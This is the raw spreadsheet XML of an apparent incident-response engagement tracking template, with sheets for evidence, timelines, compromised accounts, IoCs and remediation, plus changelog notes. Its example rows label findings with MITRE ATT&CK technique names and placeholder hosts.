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4.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.table+xml"/>
  <Override PartName="/xl/queryTables/queryTable1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.queryTable+xml"/>
  <Override PartName="/xl/tables/table15.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18"/>
  <workbookPr codeName="ThisWorkbook"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\XFIR\Cases\ETS Standardisation Task Force\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{5A1C2B6D-FF93-4733-A1F0-6C29BEC91297}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="1635" yWindow="240" windowWidth="24735" windowHeight="21120" tabRatio="701" activeTab="15" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Case summary" sheetId="8" r:id="rId1"/>
    <sheet name="Case Statistics" sheetId="28" r:id="rId2"/>
    <sheet name="Requests Tracker" sheetId="9" r:id="rId3"/>
    <sheet name="Evidence" sheetId="2" r:id="rId4"/>
    <sheet name="Systems of Interest" sheetId="5" r:id="rId5"/>
    <sheet name="Timeline" sheetId="1" r:id="rId6"/>
    <sheet name="Compromised Accounts" sheetId="4" r:id="rId7"/>
    <sheet name="IoCs" sheetId="12" r:id="rId8"/>
    <sheet name="Malware &amp; Tools" sheetId="6" r:id="rId9"/>
    <sheet name="EDR Alert Monitoring" sheetId="29" r:id="rId10"/>
    <sheet name="Keywords" sheetId="25" r:id="rId11"/>
    <sheet name="Remediation" sheetId="26" r:id="rId12"/>
    <sheet name="Data Theft" sheetId="10" r:id="rId13"/>
    <sheet name="ATT&amp;CK Values" sheetId="13" r:id="rId14"/>
    <sheet name="ATT&amp;CK Techniques - Sync" sheetId="18" r:id="rId15"/>
    <sheet name="Dropdown Lists Values" sheetId="11" r:id="rId16"/>
  </sheets>
  <definedNames>
    <definedName name="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheet.xlsxEvidence" hidden="1">Evidence[]</definedName>
    <definedName name="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheet.xlsxSystemOfInterest" hidden="1">SystemOfInterest[]</definedName>
    <definedName name="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheetCarbon.xlsxMT" hidden="1">MT[]</definedName>
    <definedName name="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheetCarbonv2.xlsxTable_techniques_addressed" hidden="1">Table_techniques_addressed</definedName>
    <definedName name="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheetCarbonv2.xlsxTimeline" hidden="1">Timeline[]</definedName>
    <definedName name="Collection">'ATT&amp;CK Values'!$J$2:$J$32</definedName>
    <definedName name="Command_and_Control">'ATT&amp;CK Values'!$K$2:$K$39</definedName>
    <definedName name="Credential_Access">'ATT&amp;CK Values'!$G$2:$G$47</definedName>
    <definedName name="Defense_Evasion">'ATT&amp;CK Values'!$F$2:$F$136</definedName>
    <definedName name="Discovery">'ATT&amp;CK Values'!$H$2:$H$36</definedName>
    <definedName name="Evidence_NamedRange" localSheetId="1">Evidence[]</definedName>
    <definedName name="Evidence_NamedRange" localSheetId="9">Evidence[]</definedName>
    <definedName name="Evidence_NamedRange">Evidence[]</definedName>
    <definedName name="Execution">'ATT&amp;CK Values'!$C$2:$C$29</definedName>
    <definedName name="Exfiltration">'ATT&amp;CK Values'!$L$2:$L$17</definedName>
    <definedName name="ExternalData_1" localSheetId="14" hidden="1">'ATT&amp;CK Techniques - Sync'!$A$1:$Q$553</definedName>
    <definedName name="Impact">'ATT&amp;CK Values'!$M$2:$M$27</definedName>
    <definedName name="Initial_Access">'ATT&amp;CK Values'!$B$2:$B$20</definedName>
    <definedName name="Lateral_Movement">'ATT&amp;CK Values'!$I$2:$I$22</definedName>
    <definedName name="members_NamedRange" localSheetId="1">Table207[Consultant Name]</definedName>
    <definedName name="members_NamedRange" localSheetId="9">Table207[Consultant Name]</definedName>
    <definedName name="members_NamedRange">Table207[Consultant Name]</definedName>
    <definedName name="MITRETechnique_NamedRange">'ATT&amp;CK Techniques - Sync'!$B$560:$B$744</definedName>
    <definedName name="Persistance">'ATT&amp;CK Values'!$D$2:$D$94</definedName>
    <definedName name="Persistence_NamedRange">'ATT&amp;CK Techniques - Sync'!$C$559:$C$623</definedName>
    <definedName name="Privilege_Escalation">'ATT&amp;CK Values'!$E$2:$E$88</definedName>
    <definedName name="Slicer_is_sub_technique">#N/A</definedName>
    <definedName name="Slicer_tactics">#N/A</definedName>
    <definedName name="SOIHostname_NamedRange" localSheetId="1">SystemOfInterest[Hostname]</definedName>
    <definedName name="SOIHostname_NamedRange" localSheetId="9">SystemOfInterest[Hostname]</definedName>
    <definedName name="SOIHostname_NamedRange">SystemOfInterest[Hostname]</definedName>
    <definedName name="Technique">'ATT&amp;CK Values'!$A$2:$A$136</definedName>
    <definedName name="UniqueTechniques_NamedRange">#REF!</definedName>
  </definedNames>
  <calcPr calcId="191028"/>
  <pivotCaches>
    <pivotCache cacheId="8460" r:id="rId17"/>
    <pivotCache cacheId="8461" r:id="rId18"/>
  </pivotCaches>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{876F7934-8845-4945-9796-88D515C7AA90}">
      <x14:pivotCaches>
        <pivotCache cacheId="8462"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defaultImageDpi="32767"/>
    </ext>
    <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{FCE2AD5D-F65C-4FA6-A056-5C36A1767C68}">
      <x15:dataModel>
        <x15:modelTables>
          <x15:modelTable id="techniques addressed_4b510bd1-6ed6-4f01-b952-7e5718ae0fe1" name="techniques addressed" connection="Query - techniques addressed"/>
          <x15:modelTable id="SystemOfInterest" name="SystemOfInterest" connection="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet.xlsx!SystemOfInterest"/>
          <x15:modelTable id="Evidence" name="Evidence" connection="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet.xlsx!Evidence"/>
          <x15:modelTable id="MT" name="MT" connection="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet - Carbon.xlsx!MT"/>
          <x15:modelTable id="Timeline" name="Timeline" connection="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet - Carbon v2.xlsx!Timeline"/>
          <x15:modelTable id="Table_techniques_addressed" name="Table_techniques_addressed" connection="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet - Carbon v2.xlsx!Table_techniques_addressed"/>
        </x15:modelTables>
        <x15:modelRelationships>
          <x15:modelRelationship fromTable="Evidence" fromColumn="Hostname" toTable="SystemOfInterest" toColumn="Hostname"/>
          <x15:modelRelationship fromTable="Table_techniques_addressed" fromColumn="target ID" toTable="MT" toColumn="ID"/>
          <x15:modelRelationship fromTable="Timeline" fromColumn="ATT&amp;CK Technique" toTable="MT" toColumn="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58" i="11" l="1" a="1"/>
  <c r="C158" i="11" s="1"/>
  <c r="J2" i="5" a="1"/>
  <c r="J2" i="5" s="1"/>
  <c r="J3" i="5" a="1"/>
  <c r="J3" i="5" s="1"/>
  <c r="J4" i="5" a="1"/>
  <c r="J4" i="5" s="1"/>
  <c r="J5" i="5" a="1"/>
  <c r="J5" i="5" s="1"/>
  <c r="J6" i="5" a="1"/>
  <c r="J6" i="5" s="1"/>
  <c r="J7" i="5" a="1"/>
  <c r="J7" i="5" s="1"/>
  <c r="J8" i="5" a="1"/>
  <c r="J8" i="5" s="1"/>
  <c r="J9" i="5" a="1"/>
  <c r="J9" i="5" s="1"/>
  <c r="J10" i="5" a="1"/>
  <c r="J10" i="5" s="1"/>
  <c r="J11" i="5" a="1"/>
  <c r="J11" i="5" s="1"/>
  <c r="J12" i="5" a="1"/>
  <c r="J12" i="5" s="1"/>
  <c r="J13" i="5" a="1"/>
  <c r="J13" i="5" s="1"/>
  <c r="J14" i="5" a="1"/>
  <c r="J14" i="5" s="1"/>
  <c r="J15" i="5" a="1"/>
  <c r="J15" i="5" s="1"/>
  <c r="J16" i="5" a="1"/>
  <c r="J16" i="5" s="1"/>
  <c r="J17" i="5" a="1"/>
  <c r="J17" i="5" s="1"/>
  <c r="J18" i="5" a="1"/>
  <c r="J18" i="5" s="1"/>
  <c r="J19" i="5" a="1"/>
  <c r="J19" i="5" s="1"/>
  <c r="J20" i="5" a="1"/>
  <c r="J20" i="5" s="1"/>
  <c r="J21" i="5" a="1"/>
  <c r="J21" i="5" s="1"/>
  <c r="J22" i="5" a="1"/>
  <c r="J22" i="5" s="1"/>
  <c r="J23" i="5" a="1"/>
  <c r="J23" i="5" s="1"/>
  <c r="J24" i="5" a="1"/>
  <c r="J24" i="5" s="1"/>
  <c r="J25" i="5" a="1"/>
  <c r="J25" i="5" s="1"/>
  <c r="I2" i="5"/>
  <c r="I3" i="5"/>
  <c r="I4" i="5"/>
  <c r="I5" i="5"/>
  <c r="I6" i="5"/>
  <c r="I7" i="5"/>
  <c r="I8" i="5"/>
  <c r="I9" i="5"/>
  <c r="I10" i="5"/>
  <c r="I11" i="5"/>
  <c r="I12" i="5"/>
  <c r="I13" i="5"/>
  <c r="I14" i="5"/>
  <c r="I15" i="5"/>
  <c r="I16" i="5"/>
  <c r="I17" i="5"/>
  <c r="I18" i="5"/>
  <c r="I19" i="5"/>
  <c r="I20" i="5"/>
  <c r="I21" i="5"/>
  <c r="I22" i="5"/>
  <c r="I23" i="5"/>
  <c r="I24" i="5"/>
  <c r="I25" i="5"/>
  <c r="G2" i="2"/>
  <c r="G3" i="2"/>
  <c r="G4" i="2"/>
  <c r="G5" i="2"/>
  <c r="G6" i="2"/>
  <c r="G7" i="2"/>
  <c r="G8" i="2"/>
  <c r="G9" i="2"/>
  <c r="G10" i="2"/>
  <c r="G11" i="2"/>
  <c r="G12" i="2"/>
  <c r="G13" i="2"/>
  <c r="G14" i="2"/>
  <c r="G15" i="2"/>
  <c r="G16" i="2"/>
  <c r="G17" i="2"/>
  <c r="G18" i="2"/>
  <c r="G19" i="2"/>
  <c r="G20" i="2"/>
  <c r="G21" i="2"/>
  <c r="G22" i="2"/>
  <c r="G23" i="2"/>
  <c r="G24" i="2"/>
  <c r="G25" i="2"/>
  <c r="G26" i="2"/>
  <c r="G27" i="2"/>
  <c r="G28" i="2"/>
  <c r="G29" i="2"/>
  <c r="C7" i="28"/>
  <c r="F38" i="28"/>
  <c r="C34" i="28"/>
  <c r="C35" i="28"/>
  <c r="C36" i="28"/>
  <c r="C37" i="28"/>
  <c r="C38" i="28"/>
  <c r="E23" i="28" a="1"/>
  <c r="E23" i="28" s="1"/>
  <c r="F23" i="28" s="1"/>
  <c r="B23" i="28" a="1"/>
  <c r="B23" i="28" s="1"/>
  <c r="C23" i="28" s="1"/>
  <c r="C21" i="28"/>
  <c r="C4" i="28"/>
  <c r="C13" i="28"/>
  <c r="C11" i="28"/>
  <c r="C12" i="28"/>
  <c r="C18" i="28"/>
  <c r="C17" i="28"/>
  <c r="C16" i="28"/>
  <c r="R28" i="1"/>
  <c r="F37" i="28" l="1"/>
  <c r="F24" i="28"/>
  <c r="F30" i="28"/>
  <c r="C29" i="28"/>
  <c r="F29" i="28"/>
  <c r="C25" i="28"/>
  <c r="F33" i="28"/>
  <c r="C32" i="28"/>
  <c r="C24" i="28"/>
  <c r="C31" i="28"/>
  <c r="F31" i="28"/>
  <c r="C30" i="28"/>
  <c r="C28" i="28"/>
  <c r="F36" i="28"/>
  <c r="F28" i="28"/>
  <c r="C33" i="28"/>
  <c r="F25" i="28"/>
  <c r="F32" i="28"/>
  <c r="C27" i="28"/>
  <c r="F35" i="28"/>
  <c r="F27" i="28"/>
  <c r="C26" i="28"/>
  <c r="F34" i="28"/>
  <c r="F26" i="28"/>
  <c r="C6" i="28"/>
  <c r="C5" i="28"/>
  <c r="C8" i="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65467E-06D6-4C6F-BA36-73A68F271F9E}" keepAlive="1" name="Query - techniques" description="Connection to the 'techniques' query in the workbook." type="5" refreshedVersion="6" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=techniques;Extended Properties=&quot;&quot;" command="SELECT * FROM [techniques]"/>
  </connection>
  <connection id="2" xr16:uid="{E983B2E0-73A8-44E4-BF5D-5E5092193E80}" name="Query - techniques addressed" description="Connection to the 'techniques addressed' query in the workbook." type="100" refreshedVersion="6" minRefreshableVersion="5">
    <extLst>
      <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{DE250136-89BD-433C-8126-D09CA5730AF9}">
        <x15:connection id="aba3b041-7651-41f2-881c-003fbcdc0607"/>
      </ext>
    </extLst>
  </connection>
  <connection id="3" xr16:uid="{EE17895D-BD2C-4E35-8CDF-D8B04347E83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4FF1560B-3EB3-4E16-82BB-7469CD2BFDF2}" name="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet - Carbon v2.xlsx!Table_techniques_addressed" type="102" refreshedVersion="6" minRefreshableVersion="5">
    <extLst>
      <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{DE250136-89BD-433C-8126-D09CA5730AF9}">
        <x15:connection id="Table_techniques_addressed">
          <x15:rangePr sourceName="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheetCarbonv2.xlsxTable_techniques_addressed"/>
        </x15:connection>
      </ext>
    </extLst>
  </connection>
  <connection id="5" xr16:uid="{EC3D9E5D-9304-4413-A9E7-DB0F265C515A}" name="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet - Carbon v2.xlsx!Timeline" type="102" refreshedVersion="6" minRefreshableVersion="5">
    <extLst>
      <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{DE250136-89BD-433C-8126-D09CA5730AF9}">
        <x15:connection id="Timeline">
          <x15:rangePr sourceName="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheetCarbonv2.xlsxTimeline"/>
        </x15:connection>
      </ext>
    </extLst>
  </connection>
  <connection id="6" xr16:uid="{8948CFA3-0A9F-4C49-900A-341BC54DB135}" name="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet - Carbon.xlsx!MT" type="102" refreshedVersion="6" minRefreshableVersion="5">
    <extLst>
      <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{DE250136-89BD-433C-8126-D09CA5730AF9}">
        <x15:connection id="MT" autoDelete="1">
          <x15:rangePr sourceName="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheetCarbon.xlsxMT"/>
        </x15:connection>
      </ext>
    </extLst>
  </connection>
  <connection id="7" xr16:uid="{189C8C54-4826-47F0-8EF2-C44147A2F5D1}" name="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet.xlsx!Evidence" type="102" refreshedVersion="6" minRefreshableVersion="5">
    <extLst>
      <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{DE250136-89BD-433C-8126-D09CA5730AF9}">
        <x15:connection id="Evidence">
          <x15:rangePr sourceName="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheet.xlsxEvidence"/>
        </x15:connection>
      </ext>
    </extLst>
  </connection>
  <connection id="8" xr16:uid="{94A10B7E-C673-4006-B951-9037CA5CF6A0}" name="WorksheetConnection_IBM X-Force IR Engagement Tracking Sheet.xlsx!SystemOfInterest" type="102" refreshedVersion="6" minRefreshableVersion="5">
    <extLst>
      <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{DE250136-89BD-433C-8126-D09CA5730AF9}">
        <x15:connection id="SystemOfInterest">
          <x15:rangePr sourceName="_xlcn.WorksheetConnection_IBMXForceIREngagementTrackingSheet.xlsxSystemOfInterest"/>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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="6473" uniqueCount="3973">
  <si>
    <t>Case Summary</t>
  </si>
  <si>
    <t>Info</t>
  </si>
  <si>
    <t>Event Date (UTC)</t>
  </si>
  <si>
    <t>Date Added</t>
  </si>
  <si>
    <t>Date Updated</t>
  </si>
  <si>
    <t>Data</t>
  </si>
  <si>
    <t>Data Details</t>
  </si>
  <si>
    <t>Earliest Evidence of Compromise</t>
  </si>
  <si>
    <t>How was breach identified?</t>
  </si>
  <si>
    <t>Earliest Compromised System</t>
  </si>
  <si>
    <t>First Compromised Account</t>
  </si>
  <si>
    <t>Identified Means of Lateral Movement</t>
  </si>
  <si>
    <t>Client Region</t>
  </si>
  <si>
    <t>Engagement Members</t>
  </si>
  <si>
    <t>Consultant Name</t>
  </si>
  <si>
    <t>Consultant Role</t>
  </si>
  <si>
    <t>Email Address</t>
  </si>
  <si>
    <t>Phone Number</t>
  </si>
  <si>
    <t>Timezone (UTC)</t>
  </si>
  <si>
    <t>Analyst 1</t>
  </si>
  <si>
    <t>Analyst 2</t>
  </si>
  <si>
    <t>Analyst 3</t>
  </si>
  <si>
    <t>Analyst 4</t>
  </si>
  <si>
    <t>Insert Additional Data Above This Row (CTRL SHIFT +)</t>
  </si>
  <si>
    <t>ETS Version:</t>
  </si>
  <si>
    <t>0.4.6</t>
  </si>
  <si>
    <t>Last Updated by:</t>
  </si>
  <si>
    <t>Bedang Sen</t>
  </si>
  <si>
    <t>Last Updated on:</t>
  </si>
  <si>
    <t>Changelog - 0.4.6</t>
  </si>
  <si>
    <t xml:space="preserve">– Updates in conditional formatting - Cells that require input are only highlighted red for non-empty rows (if the entire row is empty, it is not an invalid input).
– Added conditional formatting to detect duplicate values for 'Evidence Tag' column in teh "Evidence" sheet.
– Bug Fixes in auto generated data formulas in the sheet.
– For OS Autogeneration forumla replaced #NA with Blank spaces.
– Removed Blank spaces in drop down list in the 'Hostname' column in the "Evidence" sheet by moving dropdown input to the dropdown list sheet (spilled function).
– Updated the formula in the 'Analysis Status' column in "System of Interest" sheet to remove noisy output for empty rows.
– Updated the formula in the 'Evidence Available' column in "System of Interest" sheet to remove noisy output for empty rows.
– Dropdown list for Hostnames is now sorted alphabetically. </t>
  </si>
  <si>
    <t>Changelog - 0.4.5</t>
  </si>
  <si>
    <t>Adam Smutnicki</t>
  </si>
  <si>
    <t>– Bug fixes in conditional formatting
–  Renamed "Actions" tab to "Requests tracker"
–  Changes made to the dropdown list.</t>
  </si>
  <si>
    <t>Changelog - 0.4.4</t>
  </si>
  <si>
    <t>– Changed data type of 'Earliest malicious activity' columns in the "Compromised Accounts" Sheets to ISO datetime format.
– Changed data type of 'Date Added' and 'Date (UTC)' columns in the "Data Theft" Sheets to ISO datetime format.
– Changed the data validation in 'Urgency' column in "Remediation" sheet from manually inputted list to the Priority list from the "Data Validation" sheet.
– Added data validation in 'Priority' column in "Evidence" sheet to the Priority list from the "Data Validation" sheet.
– Added conditional formatting to "Priority" column in "Evidence" sheet.
– Moved the Priority list from "Action Items" to "General Options" in the "Dropdown List Values" sheet.
– Changed the order of the values in the "Priority List" to Critical, High, Medium, Low.
– Added conditional formatting for duplicate values in Account column in Compromised Accounts
Added Case Statistics tab.</t>
  </si>
  <si>
    <t>Changelog - 0.4.3</t>
  </si>
  <si>
    <t xml:space="preserve">‒ Added automated Evidence availability in System of interest sheet.
‒ Added automated Evidence Status in System of interest sheet.
    ‒ If there are multiple evidence sources for a host, all evidence status will be presented in a "|" delimeted list.
    ‒ If multiple evidence sources have the same status, only the unique one will be displayed.
    ‒ In the event the status of an evidence source is not inputed in the Evidence table, the autogenerated cell will display a 0 (zero). This cell will be highlighted in red to alert the analyst of the missing data.
‒ Cell information has been added to prevent manually input values in autogenerated cells.
‒ Conditional formatting with green fills have been updated to a white font from black
</t>
  </si>
  <si>
    <t>Changelog - 0.4.2</t>
  </si>
  <si>
    <t>‒ Updated data validation for Date ranges to only accept current Date with additional error message options.
‒ Added conditional formatting for priority levels in "Action Items"
‒ Updated Dropdown Lists Value sheet to reflect values in AS ETS sheet
‒ Added the option "Filesystem" to 'Artefact Type' in the 'Dropdown Lists Value' sheet.
‒ Added the option "Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx" to 'Artefact Source' in the 'Dropdown Lists Value' sheet.
‒ Removed dropdown lists for hostnames in Timeline sheet
‒ Added Conditional Formatting to Priorities in Remediation tab
‒ Moved Versioning metadata to the bottom.
‒ Fixed date formatting for all date fields.</t>
  </si>
  <si>
    <t>‒</t>
  </si>
  <si>
    <t>Summary System of Interest</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Having evidence</t>
  </si>
  <si>
    <t>Missing evidence</t>
  </si>
  <si>
    <t>Not in the scope of investigation</t>
  </si>
  <si>
    <t>Analysis completed</t>
  </si>
  <si>
    <t>Timeline</t>
  </si>
  <si>
    <t>Earliest compromised system name</t>
  </si>
  <si>
    <t>Earliest compromised system date</t>
  </si>
  <si>
    <t>Earliest compromised account name</t>
  </si>
  <si>
    <t>Other Statistics</t>
  </si>
  <si>
    <t>Compromised accounts</t>
  </si>
  <si>
    <t>Malware/tools samples</t>
  </si>
  <si>
    <t>IOCs</t>
  </si>
  <si>
    <t>Evidence Items</t>
  </si>
  <si>
    <t>(Per Type)</t>
  </si>
  <si>
    <t>(Per Status)</t>
  </si>
  <si>
    <t>Action Item ID</t>
  </si>
  <si>
    <t>Date added</t>
  </si>
  <si>
    <t>Added by</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Owner</t>
  </si>
  <si>
    <t>Due date</t>
  </si>
  <si>
    <t>Date completed</t>
  </si>
  <si>
    <t>Priority</t>
  </si>
  <si>
    <t>Requestor</t>
  </si>
  <si>
    <t>Action</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Hostname</t>
  </si>
  <si>
    <t>Added By</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>Evidence Tag</t>
  </si>
  <si>
    <t>OS</t>
  </si>
  <si>
    <t>Analyst</t>
  </si>
  <si>
    <t>Collection Date</t>
  </si>
  <si>
    <t>Received Date</t>
  </si>
  <si>
    <t>Received by</t>
  </si>
  <si>
    <t>Verified by</t>
  </si>
  <si>
    <t>Data Location</t>
  </si>
  <si>
    <t>Image Name</t>
  </si>
  <si>
    <t>Acquisition MD5</t>
  </si>
  <si>
    <t>Acquisition SHA1</t>
  </si>
  <si>
    <t>Encryption key</t>
  </si>
  <si>
    <t>Domain</t>
  </si>
  <si>
    <t>IPv4 Address</t>
  </si>
  <si>
    <t>Function</t>
  </si>
  <si>
    <t>Compromise status</t>
  </si>
  <si>
    <t>Evidence Available</t>
  </si>
  <si>
    <t>Analysis Status</t>
  </si>
  <si>
    <t>Reason to be Added</t>
  </si>
  <si>
    <t>Timeline merged to ETS</t>
  </si>
  <si>
    <t>Persistent malware</t>
  </si>
  <si>
    <t>Date/Time (UTC)</t>
  </si>
  <si>
    <t>Notable Event</t>
  </si>
  <si>
    <t>Hostname (from evidence)</t>
  </si>
  <si>
    <t>Src hostname</t>
  </si>
  <si>
    <t>Src Account</t>
  </si>
  <si>
    <t>Dst hostname/IP</t>
  </si>
  <si>
    <t>Dst Account</t>
  </si>
  <si>
    <t>Artefact Source</t>
  </si>
  <si>
    <t>Artefact Type</t>
  </si>
  <si>
    <t>Artefact Details</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>ATT&amp;CK Tactic</t>
  </si>
  <si>
    <t>ATT&amp;CK Technique</t>
  </si>
  <si>
    <t>ATT&amp;CK Subtechnique</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>Application Layer Protocol: DNS</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>Server Software Component: Web Shell</t>
  </si>
  <si>
    <t>Server Software Component: Transport Agent</t>
  </si>
  <si>
    <t>Example 1:</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>Modify System Image: Patch System Image</t>
  </si>
  <si>
    <t>HostB</t>
  </si>
  <si>
    <t>HostA</t>
  </si>
  <si>
    <t>UserB</t>
  </si>
  <si>
    <t>Security.evtx</t>
  </si>
  <si>
    <t>Windows Event Logs</t>
  </si>
  <si>
    <t>Type 3</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Golden Ticket</t>
  </si>
  <si>
    <t>UserA</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Account Manipulation: Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>Weaken Encryption: Reduce Key Space</t>
  </si>
  <si>
    <t>Example 2:</t>
  </si>
  <si>
    <t>IP_A</t>
  </si>
  <si>
    <t>Type 10</t>
  </si>
  <si>
    <t>Microsoft-Windows-TerminalServices-RDPClient Operational.evtx</t>
  </si>
  <si>
    <t>Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational.evtx</t>
  </si>
  <si>
    <t>NTUSER.dat (hive)</t>
  </si>
  <si>
    <t>Registry</t>
  </si>
  <si>
    <t>TSClient</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Input Capture: Keylogging</t>
  </si>
  <si>
    <t>Example 3:</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>HostC</t>
  </si>
  <si>
    <t>UserC</t>
  </si>
  <si>
    <t>HostD</t>
  </si>
  <si>
    <t>UserD</t>
  </si>
  <si>
    <t>Execute psexec</t>
  </si>
  <si>
    <t>Application Layer Protocol: File Transfer Protocols</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Example 4:</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>HostZ</t>
  </si>
  <si>
    <t>UserZ</t>
  </si>
  <si>
    <t>ShellBag</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>Modify Authentication Process: Password Filter DLL</t>
  </si>
  <si>
    <t>UsrClass.dat (hive)</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>UserAssist</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>MRU</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Security Appliances</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Steganography</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Attachment</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Account</t>
  </si>
  <si>
    <t>SID</t>
  </si>
  <si>
    <t>Earliest malicious activity</t>
  </si>
  <si>
    <t>Attacker Created?</t>
  </si>
  <si>
    <t>Reason to be added</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>IoC Value</t>
  </si>
  <si>
    <t>File Name</t>
  </si>
  <si>
    <t>Sample Status</t>
  </si>
  <si>
    <t>RE ticket number</t>
  </si>
  <si>
    <t>MD5</t>
  </si>
  <si>
    <t>SHA1</t>
  </si>
  <si>
    <t>SHA256</t>
  </si>
  <si>
    <t>Full Paths</t>
  </si>
  <si>
    <t>System(s)</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>Date</t>
  </si>
  <si>
    <t>XFIR Resource</t>
  </si>
  <si>
    <t>Action performed</t>
  </si>
  <si>
    <t>Turnover Needed</t>
  </si>
  <si>
    <t>XFIR Resource 2</t>
  </si>
  <si>
    <t>Follow on tasks</t>
  </si>
  <si>
    <t>Final Staus</t>
  </si>
  <si>
    <t>Forensic Keywords</t>
  </si>
  <si>
    <t xml:space="preserve">Use this tab to track incident-specific keywords to facilitate forensic analysis. </t>
  </si>
  <si>
    <t>High Level Task</t>
  </si>
  <si>
    <t>Reason</t>
  </si>
  <si>
    <t>Urgency</t>
  </si>
  <si>
    <t>Effort</t>
  </si>
  <si>
    <t>Shared with</t>
  </si>
  <si>
    <t>Shared when</t>
  </si>
  <si>
    <t>THIS IS EXAMPLE: Check if LAPS (or similar) is present across the whole enviroment (servers and workstatins)</t>
  </si>
  <si>
    <t>Client</t>
  </si>
  <si>
    <t>Not started</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Short-term</t>
  </si>
  <si>
    <t>Acme's CISO</t>
  </si>
  <si>
    <t>THIS IS EXAMPLE: Deploy LAPS if not present</t>
  </si>
  <si>
    <t>Mid-term</t>
  </si>
  <si>
    <t>Acme's war room call</t>
  </si>
  <si>
    <t>THIS IS EXAMPLE: Secure password reset for compromised accounts</t>
  </si>
  <si>
    <t>Critical</t>
  </si>
  <si>
